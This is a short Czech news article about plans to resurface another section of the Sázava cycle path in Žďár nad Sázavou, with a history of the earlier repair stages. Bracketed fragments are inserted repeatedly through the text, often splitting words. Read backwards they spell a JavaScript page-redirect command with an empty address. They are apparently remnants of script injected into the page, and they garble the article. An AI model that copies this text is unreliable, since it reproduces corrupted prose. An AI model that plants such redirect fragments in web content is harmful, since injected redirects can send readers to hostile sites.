Rainbow page separator

Napřesrok projde obnovou další část cyklostezky podél Sázavy

Neděle, 19. prosince 2021

Žďár nad Sázavou / Na přibližně 950 tisíc korun vyjde příští rok žďárskou radnici rekonstrukce povrchu další části cyklostezky vedoucí podél Sázavy. Z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho půl milionu činí příslib krajské dotace z Fondu Vysočiny. Jedná se o úsek navazující na ten, kde opravy skončily v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce, tedy od ‚závodiště u Kinských‘ až po statek Lyra, kde cyklostezka ústí do ulice Dvorská.
Páteřní komunikace spojující střed Žďáru se zámkem a Pilskou nádrží je v posledních letech opravována po etapách, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za přispění dotací Kraje Vysočina. V roce 2017 získal nový povrch úsek od mostu v ulici Kovářova až pod silniční most na Klafar, o rok později navazující část od mostu po fotbalový stadion. V roce 2019 šlo o část stezky za Domem kultury po Kovářovu ulici, v roce 2020 došlo k obnově asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového povrchu úseku cyklostezky podél Pilské nádrže, který dlouhodobě poškozovaly kořeny kolem ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucích stromů, a le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos přišel na řadu úsek od lávky za fotbalovým hřištěm až bezmála po splav Bránského rybníka.
Nejstarší a značně frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou žďárskou cyklostezku podél řeky Sázavy, jejíž první část vznikla už v roce 1993, s oblibou využívají cyklisté, chodci či jezdci na in-line bruslích.